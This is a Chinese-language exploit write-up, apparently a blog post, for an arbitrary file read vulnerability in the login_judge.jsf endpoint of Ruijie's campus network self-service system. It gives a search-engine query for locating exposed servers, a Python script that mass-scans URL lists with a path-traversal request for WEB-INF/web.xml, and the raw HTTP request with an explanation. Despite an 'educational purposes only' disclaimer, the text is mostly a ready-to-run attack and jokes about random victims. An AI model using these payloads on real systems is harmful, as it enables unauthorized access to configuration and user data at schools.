声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。
一、漏洞描述
锐捷校园网自助服务系统是用于学校网络管理的一个平台,**login_judge.jsf
**接口存在任意文件读取漏洞,意味着攻击者可能通过特定的请求访问或下载系统上的任意文件,这可能包括敏感的配置信息、用户数据等。
二、资产收集
1.使用网络空间测绘引擎搜索
鹰图检索:web.body="校园网自助服务系统"
2.使用poc批量扫描
python
import requests
import argparse
import time
from urllib3.exceptions import InsecureRequestWarning
# 禁用不安全的请求警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# 定义颜色代码,用于输出红色文本
RED = '\033[91m'
RESET = '\033[0m'
def check_vulnerability(url):
"""
检查目标URL是否存在锐捷校园网自助服务系统login_judge任意文件读取漏洞。
:param url: 目标URL
"""
try:
# 构造攻击URL,尝试访问WEB-INF目录下的web.xml文件
attack_url = url.rstrip('/') + "/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=%2e/WEB-INF/web.xml%3F"
# 发送GET请求,不验证SSL证书,设置超时时间为10秒
response = requests.get(attack_url, verify=False, timeout=10)
# 判断响应状态码和响应内容是否包含特定字符串
if response.status_code == 200 and 'web-app' in response.text:
print(f"{RED}URL [{url}] 存在锐捷校园网自助服务系统login_judge任意文件读取漏洞{RESET}")
else:
print(f"URL [{url}] 不存在漏洞")
except requests.exceptions.Timeout:
# 捕获超时异常,提示可能存在漏洞
print(f"URL [{url}] 请求超时,可能存在漏洞")
except requests.RequestException as e:
# 捕获其他请求异常,输出错误信息
print(f"URL [{url}] 请求失败: {e}")
def main():
"""
主函数,解析命令行参数并执行漏洞检测。
"""
parser = argparse.ArgumentParser(description='检测目标地址是否存在锐捷校园网自助服务系统login_judge任意文件读取漏洞')
parser.add_argument('-u', '--url', help='指定目标地址')
parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')
args = parser.parse_args()
if args.url:
# 如果提供了单个URL参数,确保其以http://或https://开头
if not args.url.startswith("http://") and not args.url.startswith("https://"):
args.url = "http://" + args.url
check_vulnerability(args.url)
elif args.file:
# 如果提供了文件参数,逐行读取文件中的URL并进行检查
with open(args.file, 'r') as file:
urls = file.read().splitlines()
for url in urls:
if not url.startswith("http://") and not url.startswith("https://"):
url = "http://" + url
check_vulnerability(url)
if __name__ == '__main__':
main()
cmd运行:python poc.py -f url.txt
随机寻找的幸运儿
三、漏洞复现
1.构造数据包
html
GET /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F HTTP/1.1
Host:ip
2.数据包分析
- **
GET
:**表示这是一个HTTP GET请求。 /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F
: 这是请求的URL路径。它包含了多个目录和文件名,以及一个查询参数view
。查询参数的值是./WEB-INF/web.xml%3F
,其中./WEB-INF/web.xml
文件是Java Web应用程序的配置文件,它包含了关于Web应用程序的配置信息,%3F
是问号(?
)的URL编码,这个查询参数是用来指定要访问的资源或执行某些操作。HTTP/1.1
: 表示使用的是HTTP协议的版本1.1。Host: ip
: 这是一个HTTP头字段,表示请求的目标主机地址。这里的ip
应该是实际的IP地址或者域名。
3.结束跑路
通过网页访问:
ip/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F
通过yakit构建数据包访问
每篇一言:心向花开,何不朝夕。